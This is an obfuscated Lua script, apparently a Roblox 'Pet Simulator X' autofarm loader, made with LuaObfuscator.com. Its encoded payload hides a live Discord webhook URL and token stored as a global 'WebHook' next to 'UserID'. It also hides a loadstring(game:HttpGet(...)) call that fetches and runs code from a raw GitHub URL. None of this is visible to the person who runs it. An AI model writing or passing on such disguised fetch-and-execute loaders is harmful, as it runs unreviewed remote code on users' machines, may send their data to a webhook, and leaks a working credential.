--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (v0==5) then function v15(v16,v17)local v18=1;local v19;v16=v5(v4(v16,5),"..",function(v30)if (v2(v30,2)==79) then local v64=0;while true do if (v64==0) then v19=v1(v4(v30,1,1));return "";end end else local v65=0;local v66;while true do if (0==v65) then v66=v3(v1(v30,16));if v19 then local v80=0;local v81;while true do if (v80==0) then v81=v6(v66,v19);v19=nil;v80=1;end if (v80==1) then return v81;end end else return v66;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v67=(v31/((1350 -(239 + 733 + 376))^(v32-(468 -(261 + (1187 -(866 + 115)))))))%((1 + 1)^(((v33-(1442 -(48 + 1393))) -(v32-(1 + 0))) + (2 -1)));return v67-(v67%(1 + 0));else local v68=0 -0;local v69;while true do if (v68==(0 -0)) then v69=(2 + 0)^(v32-(758 -(178 + (2418 -(178 + 1661)))));return (((v31%(v69 + v69))>=v69) and (1498 -(364 + 1133))) or (0 + 0);end end end end local function v21()local v38=v2(v16,v18,v18);v18=v18 + 1;return v38;end local function v22()local v39,v40=v2(v16,v18,v18 + (401 -(394 + 5)));v18=v18 + (1628 -(559 + 1067));return (v40 * (57 + 199)) + v39;end local function v23()local v41=374 -(186 + 188);local v42;local v43;local v44;local v45;while true do if (v41==(272 -(20 + 251))) then return (v45 * (15630138 + (1148208 -(375 + 755)))) + (v44 * ((64500 + 2584) -(895 + 653))) + (v43 * (2253 -(1845 + 152))) + v42;end if (v41==(0 + 0)) then v42,v43,v44,v45=v2(v16,v18,v18 + 3);v18=v18 + (771 -(22 + 745));v41=4 -3;end end end local function v24()local v46=0 + 0;local v47;local v48;while true do if (v46==((6414 -4796) -(626 + 992))) then v47=v23();v48=v23();v46=1 + 0;end if (v46==(1992 -(1096 + 414 + 481))) then return (( -(7 -(9 -4)) * v20(v48,1707 -(1424 + 251))) + 1 + 0 + 0) * ((1024 -(54 + 329 + 639))^(v20(v48,5 + 16,1932 -(631 + 1270)) -(2012 -989))) * ((((v20(v48,1 -0,1928 -(1137 + 771)) * (2^(14 + 18))) + v47)/((1712 -(738 + 972))^52)) + (968 -(872 + 95)));end end end local function v25(v34)local v49=0 + 0;local v50;local v51;while true do if (v49==(0 + (0 -0))) then v50=nil;if  not v34 then v34=v23();if (v34==(0 + 0)) then return "";end end v49=157 -(32 + 124);end if ((1638 -(1084 + 553))==v49) then v50=v4(v16,v18,(v18 + v34) -(1 -(0 -0)));v18=v18 + v34;v49=2;end if ((7 -5)==v49) then v51={};for v76=1 + 0, #v50 do v51[v76]=v3(v2(v4(v50,v76,v76)));end v49=3 + 0;end if (v49==(3 + 0)) then return v7(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(1 + 2)) then else v59=nil;v60=nil;v52=6 -2;end if (v52==2) then v57=nil;v58=nil;v52=11 -8;end if (v52~=(0 -0)) then else v53=0;v54=nil;v52=357 -(333 + 23);end if (v52~=(2 + 2)) then else while true do if (v53~=(1834 -(1786 + 45))) then else v60=nil;while true do local v82=0;local v83;while true do if (v82~=0) then else v83=0 + 0;while true do if (v83~=(2 -1)) then else if (v54==(2 + 0)) then local v104=0;local v105;local v106;while true do if (v104==0) then v105=1456 -(1266 + 190);v106=nil;v104=1746 -(1615 + 130);end if (v104~=(1 + 0)) then else while true do if (v105~=(0 -0)) then else v106=1814 -(507 + 1307);while true do local v124=1608 -(919 + 689);while true do if (v124~=0) then else if (v106==0) then local v132=0;while true do if (v132~=(1 + 0)) then else v106=769 -(416 + 352);break;end if (0==v132) then for v145=1 + 0,v23() do local v146=1018 -(119 + 899);local v147;local v148;local v149;local v150;while true do if (v146~=(0 -0)) then else v147=1501 -(443 + 1058);v148=nil;v146=1;end if (v146==(1 + 0)) then v149=nil;v150=nil;v146=2;end if (v146==2) then while true do if (v147==(1807 -(412 + 1395))) then v148=0;v149=nil;v147=1 + 0;end if ((916 -(534 + 381))==v147) then v150=nil;while true do if (v148~=(1 + 0)) then else while true do if (v149~=(256 -(9 + 247))) then else v150=v21();if (v20(v150,1,1 -0)~=0) then else local v166=268 -(186 + 82);local v167;local v168;local v169;local v170;local v171;local v172;while true do if (v166==(2 -1)) then v169=nil;v170=nil;v166=1 + 1;end if (v166~=(0 + 0)) then else v167=0;v168=nil;v166=1;end if (v166~=(1574 -(325 + 1246))) then else while true do if (v167~=2) then else v172=nil;while true do if (v168~=2) then else while true do if (3==v169) then if (v20(v171,552 -(283 + 266),3)==1) then v172[4]=v60[v172[634 -(568 + 62)]];end v55[v145]=v172;break;end if (v169==(1 + 0)) then local v182=1278 -(954 + 324);while true do if (v182==(169 -(139 + 30))) then v172={v22(),v22(),nil,nil};if (v170==0) then local v188=0 + 0;local v189;while true do if (v188==0) then v189=274 -(219 + 55);while true do if (v189==(0 + 0)) then v172[3]=v22();v172[1 + 3]=v22();break;end end break;end end elseif (v170==(1 + 0)) then v172[1629 -(128 + 1498)]=v23();elseif (v170==(1942 -(1850 + 90))) then v172[3]=v23() -((1095 -(779 + 314))^(47 -31));elseif (v170==3) then local v196=0 + 0;local v197;local v198;while true do if ((1 + 0)~=v196) then else while true do if (v197~=(1675 -(206 + 1469))) then else v198=0 -0;while true do if (v198==0) then v172[13 -10]=v23() -((4 -2)^(1672 -(1342 + 314)));v172[1 + 3]=v22();break;end end break;end end break;end if (v196==(961 -(684 + 277))) then v197=0 -0;v198=nil;v196=1750 -(1317 + 432);end end end v182=2 -1;end if ((3 -2)~=v182) then else v169=2 + 0;break;end end end if (v169==2) then local v183=0 + 0;local v184;while true do if (v183==(1716 -(1650 + 66))) then v184=1398 -(676 + 722);while true do if (v184~=1) then else v169=3 + 0;break;end if ((0 + 0)~=v184) then else local v190=0;while true do if (v190~=(0 + 0)) then else if (v20(v171,1969 -(1420 + 548),970 -(65 + 904))==(1 + 0)) then v172[2 + 0]=v60[v172[1 + 1]];end if (v20(v171,1287 -(883 + 402),2)~=1) then else v172[3 + 0]=v60[v172[8 -5]];end v190=1 + 0;end if (v190~=(1 -0)) then else v184=1 + 0;break;end end end end break;end end end if (v169==(0 -0)) then local v185=1197 -(438 + 759);local v186;while true do if (0~=v185) then else v186=759 -(527 + 232);while true do if (v186==(313 -(153 + 159))) then v169=1;break;end if (v186==(0 -0)) then local v191=0 + 0;while true do if (v191~=(1 -0)) then else v186=1 + 0;break;end if (v191==0) then v170=v20(v150,5 -3,3);v171=v20(v150,1 + 3,6);v191=1 + 0;end end end end break;end end end end break;end if (v168==1) then local v179=0;while true do if (v179~=(0 + 0)) then else v171=nil;v172=nil;v179=2 -1;end if (v179==(4 -3)) then v168=1324 -(650 + 672);break;end end end if (v168~=0) then else local v180=646 -(294 + 352);while true do if ((1275 -(337 + 938))~=v180) then else v169=1947 -(43 + 1904);v170=nil;v180=1 + 0;end if (1==v180) then v168=1 + 0;break;end end end end break;end if ((1 + 0)~=v167) then else local v177=0 + 0;while true do if (v177~=(1 + 0)) then else v167=1 + 1;break;end if (v177==(0 + 0)) then v170=nil;v171=nil;v177=1 + 0;end end end if (v167~=(511 -(30 + 481))) then else local v178=0;while true do if (v178~=(172 -(45 + 127))) then else v168=0;v169=nil;v178=1;end if (v178~=(1712 -(206 + 1505))) then else v167=1 -0;break;end end end end break;end if (v166~=(2 -0)) then else v171=nil;v172=nil;v166=3 + 0;end end end break;end end break;end if (v148==0) then local v162=0;local v163;while true do if (v162~=(0 -0)) then else v163=0 + 0;while true do if (v163~=(0 -0)) then else local v173=0;while true do if (v173~=(366 -(39 + 326))) then else v163=2 -1;break;end if (v173~=(516 -(235 + 281))) then else v149=0 + 0;v150=nil;v173=1 -0;end end end if (1~=v163) then else v148=1;break;end end break;end end end end break;end end break;end end end for v151=360 -(98 + 261),v23() do v56[v151-(1 + 0)]=v28();end v132=1;end end end if (v106==(732 -(14 + 717))) then for v136=520 -(68 + 451),v23() do v57[v136]=v23();end return v58;end break;end end end break;end end break;end end end break;end if (v83==(521 -(240 + 281))) then local v102=600 -(342 + 258);local v103;while true do if ((0 + 0)==v102) then v103=0 + 0;while true do if (v103==(127 -(24 + 103))) then local v107=0 -0;while true do if (v107==0) then if (v54~=(0 -0)) then else local v126=0;local v127;while true do if ((0 + 0)==v126) then v127=0 + 0;while true do if (v127~=(0 + 0)) then else local v141=0 -0;while true do if (v141==1) then v127=1;break;end if (v141==(0 + 0)) then local v153=0 + 0;while true do if (v153==(14 -(8 + 6))) then v55={};v56={};v153=1 + 0;end if (v153==(3 -2)) then v141=1 -0;break;end end end end end if (v127==2) then v54=1 -0;break;end if (v127~=(2 -1)) then else local v142=0;while true do if (0==v142) then v57={};v58={v55,v56,nil,v57};v142=1 + 0;end if (v142==(887 -(856 + 30))) then v127=3 -1;break;end end end end break;end end end if (1~=v54) then else local v128=0 + 0;local v129;while true do if (v128~=0) then else v129=0 -0;while true do if (v129~=(1 -0)) then else local v143=959 -(709 + 250);local v144;while true do if (v143==(494 -(239 + 255))) then v144=1962 -(362 + 1600);while true do if (v144~=(1 + 0)) then else v129=2;break;end if (v144==0) then for v156=1676 -(161 + 1514),v59 do local v157=0;local v158;local v159;local v160;local v161;while true do if (v157==(1323 -(671 + 650))) then while true do if (v158~=(1 + 0)) then else v161=nil;while true do if (v159==(209 -(20 + 189))) then local v174=0 + 0;while true do if (v174==(1 + 0)) then v159=1;break;end if (v174~=(951 -(920 + 31))) then else local v176=0 + 0;while true do if (v176~=(1 + 0)) then else v174=1;break;end if ((0 + 0)~=v176) then else v160=v21();v161=nil;v176=1;end end end end end if (v159==(1 + 0)) then if (v160==(2 -1)) then v161=v21()~=(336 -(13 + 323));elseif (v160==(2 + 0)) then v161=v24();elseif (v160~=(7 -4)) then else v161=v25();end v60[v156]=v161;break;end end break;end if (v158==(0 + 0)) then local v164=1899 -(16 + 1883);local v165;while true do if (v164==(0 + 0)) then v165=565 -(217 + 348);while true do if (v165==(0 -0)) then v159=0 + 0;v160=nil;v165=1 + 0;end if ((406 -(77 + 328))~=v165) then else v158=952 -(168 + 783);break;end end break;end end end end break;end if (0~=v157) then else v158=0 + 0;v159=nil;v157=2 -1;end if (v157==(838 -(689 + 148))) then v160=nil;v161=nil;v157=1100 -(487 + 611);end end end v58[587 -(352 + 232)]=v21();v144=1 + 0;end end break;end end end if (v129==(0 + 0)) then v59=v23();v60={};v129=1 -0;end if (v129~=(2 -0)) then else v54=543 -(226 + 315);break;end end break;end end end v107=1;end if (v107~=(1086 -(464 + 621))) then else v103=1 + 0;break;end end end if (v103~=(2 -1)) then else v83=1 + 0;break;end end break;end end end end break;end end end break;end if ((0 + 0)~=v53) then else local v78=0;while true do if (v78~=0) then else v54=0 + 0;v55=nil;v78=4 -3;end if (v78~=(2 -1)) then else v53=1;break;end end end if (v53==(610 -(286 + 323))) then local v79=1344 -(724 + 620);while true do if (v79==(771 -(157 + 614))) then v56=nil;v57=nil;v79=1 -0;end if ((3 -2)~=v79) then else v53=4 -2;break;end end end if (v53~=(5 -3)) then else v58=nil;v59=nil;v53=395 -(382 + 10);end end break;end if (v52~=(3 -2)) then else v55=nil;v56=nil;v52=3 -1;end end end local function v29(v35,v36,v37)local v61=v35[1];local v62=v35[2];local v63=v35[3];return function(...)local v70=0;local v71;local v72;local v73;local v74;local v75;while true do if (0==v70) then v71=1;v72= -1;v70=1;end if (1==v70) then v73={...};v74=v12("#",...) -1;v70=2;end if (v70==3) then A,B=v27(v11(v75));if  not A[1] then local v84=0;local v85;while true do if (v84==0) then v85=v35[4][v71] or "?";error("Script error at ["   .. v85   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end break;end if (v70==2) then v75=nil;function v75()local v86=v61;local v87=Const;local v88=v62;local v89=v63;local v90=v27;local v91={};local v92={};local v93={};for v97=0,v74 do if (((3460 -(176 + 100))>((1630 -(102 + 1410)) + 820)) and (v97>=v89)) then v91[v97-v89]=v73[v97 + 1 + 0];else v93[v97]=v73[v97 + 1 + (0 -0)];end end local v94=(v74-v89) + 1 + (103 -(40 + 63));local v95;local v96;while true do local v98=285 -(30 + 255);local v99;while true do if (((2907 + 1477)==(2995 + 1389)) and (v98==0)) then v99=0 -0;while true do if (((4991 -2930)>=(1720 -(658 + 976))) and (v99==(955 -(341 + 614)))) then v95=v86[v71];v96=v95[589 -(128 + 460)];v99=(3 -1) -1;end if (((5004 -(147 + 686))>=(7707 -3581)) and (v99==(1 + 0))) then if (((2878 -(893 + 120))<2692) and (v96<=((267 -(48 + 92)) -(4 + 120)))) then if (((1070 + 222)<=(2768 -(342 + 1093))) and (v96<=(1 -(0 -0)))) then if ((v96==(1625 -(1181 + 444))) or ((14623 -(6067 + 4462))>4906)) then local v108=1291 -(136 + 1155);local v109;local v110;local v111;local v112;while true do if ((v108==(1 + 1)) or ((770 + 3159)<(266 + 49))) then while true do if (((7443 -4667)<=(4086 -(136 + 873))) and (v109==0)) then v110=0;v111=nil;v109=1;end if ((v109==(1 + 0 + 0)) or ((5492 -(626 + 498))<3094)) then v112=nil;while true do if ((((4259 -(220 + 64)) -((2212 -(341 + 1166)) + 278))>=2267) and (v110==(1 + 0))) then v93[v111 + (985 -(234 + 750))]=v112;v93[v111]=v112[v95[4 + 0]];break;end if ((v110==0) or ((5108 -2981)<(455 -((7 -2) + 235)))) then local v140=0;while true do if ((v140==(0 + 0)) or (2980<=(2321 -(277 + 355)))) then v111=v95[(3 -2) + 1];v112=v93[v95[890 -(513 + (884 -(157 + 353)))]];v140=3 -2;end if ((4638>=4195) and (v140==((1 + 0) -0))) then v110=(1869 -(1453 + 413)) -2;break;end end end end break;end end break;end if ((v108==(1539 -((2705 -1836) + 670))) or (4533==(3756 -(75 + 24)))) then v109=1722 -(77 + 1645);v110=nil;v108=1 + 0;end if ((v108==(824 -(416 + 407))) or ((6426 -(1206 + 773))<2174)) then v111=nil;v112=nil;v108=3 -1;end end else v93[v95[5 -3]]=v95[(2 + 1) -0];end elseif (((14100 -10298)>(5303 -(1620 + (425 -339)))) and (v96>((1022 -689) -(253 + 78)))) then v93[v95[(3670 -2343) -(1323 + 2)]]();else v93[v95[610 -(64 + 544)]]=v37[v95[8 -(11 -6)]];end elseif ((3290<4154) and (v96<=(570 -(64 + 501)))) then if ((v96==(7 -3)) or ((2251 -(203 + 176))<(3895 -(6292 -3776)))) then local v115=0 -0;local v116;local v117;local v118;local v119;local v120;while true do if ((v115==((3312 -1506) -((1914 -1426) + 1316))) or ((617 + 1490)==(8383 -(14943 -8479)))) then v120=nil;while true do if ((v116==(1541 -(359 + 1180))) or ((600 -(441 + 66))>(2022 + 74))) then for v133=v117,v72 do local v134=0 -(0 -0);local v135;while true do if ((((1964 -959) + 788)<(3270 -(1070 + 110))) and (v134==(0 + 0))) then v135=0 + 0;while true do if ((v135==(0 -0)) or (((1062 -(182 + 147)) + 1525)>(20298 -15532))) then v120=v120 + 1 + 0 + 0;v93[v133]=v118[v120];break;end end break;end end end break;end if ((v116==(1435 -(509 + 926))) or ((2797 -(258 + 716))>(7185 -3874))) then local v130=1368 -(19 + 1349);while true do if (((215 + (1520 -(750 + 224)))<=((5900 -(388 + 404)) -(560 + (2197 -(187 + 1536))))) and (v130==1)) then v116=2 -(1 + 0);break;end if (((56 + 834)==(1201 -311)) and (v130==0)) then v117=v95[1 + 1];v118,v119=v90(v93[v117](v13(v93,v117 + 1,v95[3])));v130=1163 -(40 + 1122);end end end if (((2339 -661)<(3591 + 50)) and (v116==((1574 -(1539 + 34)) -0))) then local v131=0 + 0;while true do if ((3626>=(8224 -5897)) and (v131==1)) then v116=4 -2;break;end if (((4981 -(291 + 1463))<=(4860 -((2170 -(872 + 1060)) + 878))) and (v131==((1208 -(615 + 593)) + 0))) then v72=(v119 + v117) -(1 -0);v120=0;v131=1 + 0;end end end end break;end if (((422 + 3960)==(5979 -(1174 + 423))) and (v115==(941 -(836 + 104)))) then v118=nil;v119=nil;v115=543 -(312 + 229);end if (((2472 -(148 + 1412))<=(3744 -(213 + 198))) and (v115==0)) then v116=1454 -(725 + 729);v117=nil;v115=387 -(174 + 212);end end else v93[v95[4 -2]][v95[1084 -(812 + 269)]]=v95[3 + 1];end elseif ((v96==6) or ((1548 -(122 + 236 + 314))>=(14369 -9474))) then local v122=0 -0;local v123;while true do if ((v122==0) or ((15197 -(10911 + 1225))<=(1978 + 392))) then v123=v95[5 -3];v93[v123]=v93[v123](v13(v93,v123 + 1,v72));break;end end else do return;end end v71=v71 + 1;break;end end break;end end end end v70=3;end end end;end return v29(v28(),{},v17)();end v15("LOL!093O0003023O005F4703063O00557365724944023O00B6B843E94103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313035343735373233343633363233383930392F64625256467A6934454E2O4A646F4B386B434F767A586652576766696B3450726E512D3133355341464C6762615169315847427A56736273586335785F3345464767394D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403553O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53696C656E6365536372697074732F507378536372697074732E4C75612F6D61696E2F5073784175746F6661726D2E74727565000C3O0012023O00013O0030053O000200030012023O00013O0030053O000400050012023O00063O001202000100073O00202O000100010008001201000300094O0004000100034O00065O00022O00033O000100012O00073O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9());break;end if (v0==4) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end if (v0==2) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (v0==3) then v10=setmetatable;v11=pcall;v12=select;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
